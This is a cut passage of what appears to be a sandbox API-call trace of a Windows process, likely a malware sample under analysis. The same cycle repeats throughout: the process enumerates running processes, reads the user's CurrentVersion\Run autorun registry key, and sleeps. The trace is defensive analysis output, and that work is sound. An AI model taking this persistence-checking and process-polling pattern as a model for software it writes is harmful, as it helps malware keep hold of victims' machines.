SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.595] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.612] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.612] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.612] NtClose (Handle=0x154) returned 0x0 [0177.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.617] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.626] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.626] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.626] NtClose (Handle=0x154) returned 0x0 [0177.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.630] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.638] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.638] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.638] NtClose (Handle=0x154) returned 0x0 [0177.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.643] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.654] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.654] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.654] NtClose (Handle=0x154) returned 0x0 [0177.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.658] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.676] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.676] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.676] NtClose (Handle=0x154) returned 0x0 [0177.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.681] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.686] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.686] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.686] NtClose (Handle=0x154) returned 0x0 [0177.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.690] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.700] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.700] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.700] NtClose (Handle=0x154) returned 0x0 [0177.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.705] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.716] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.716] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.716] NtClose (Handle=0x154) returned 0x0 [0177.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.720] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.731] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.731] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.731] NtClose (Handle=0x154) returned 0x0 [0177.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.736] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.747] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.747] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.747] NtClose (Handle=0x154) returned 0x0 [0177.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.751] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.763] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.763] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.763] NtClose (Handle=0x154) returned 0x0 [0177.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.767] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.778] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.778] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.778] NtClose (Handle=0x154) returned 0x0 [0177.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.783] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.796] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.796] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.796] NtClose (Handle=0x154) returned 0x0 [0177.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.800] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.814] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.814] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, 